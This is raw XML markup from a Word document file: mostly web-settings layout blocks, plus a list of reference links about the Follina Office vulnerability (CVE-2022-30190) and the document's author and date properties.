        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1635595712">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1682778505">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1722170380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911848064">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2069958853">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2132673769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1687243064">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1561360829">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1842502135">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1832872265">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="897209697">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="125971665">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1747259997">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="115301474">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="905341722">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1845853434">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="905266808">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="118381093">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1377581193">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1748725917">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1418481417">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="962924551">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1517308664">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="606543512">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="761074313">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="457605012">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="192040239">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="372076561">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1710061589">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1662074045">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="932279692">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="482625416">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="13427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witter.com/nao_sec/status/1530196847679401984" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/lifecycle/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nwpc-ch.org/exploits/microsoft-office-word-msdtjs-code-execution-packet-storm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cve.org/CVERecord?id=CVE-2022-30190" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_msdtjs_rc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ublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"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msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/fileformat/word_msdtjs_rc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huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kaspersky.com/blog/follina-cve-2022-30190-msdt/444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5</Pages>
  <Words>1968</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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chubbin H N</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <cp:lastPrinted>2024-04-28T16:13:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-09T14:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-04T20:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>